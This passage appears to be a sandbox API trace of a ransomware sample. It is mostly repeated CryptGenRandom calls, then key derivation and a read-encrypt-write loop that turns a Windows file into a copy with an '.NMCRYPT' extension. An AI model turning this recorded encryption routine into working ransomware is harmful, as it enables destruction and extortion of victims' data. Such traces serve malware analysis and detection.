pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.483] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.486] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.486] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.486] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0154.486] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.487] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad138) returned 1 [0154.487] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0154.487] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0154.487] wcslen (_String="\\\\?\\") returned 0x4 [0154.487] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad678) returned 1 [0154.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0154.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0154.518] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0154.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0154.519] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.520] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.521] GetLastError () returned 0x0 [0154.521] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.522] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.522] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.522] GetLastError () returned 0x0 [0154.522] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.522] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.522] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.522] GetLastError () returned 0x0 [0154.522] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.522] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.522] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 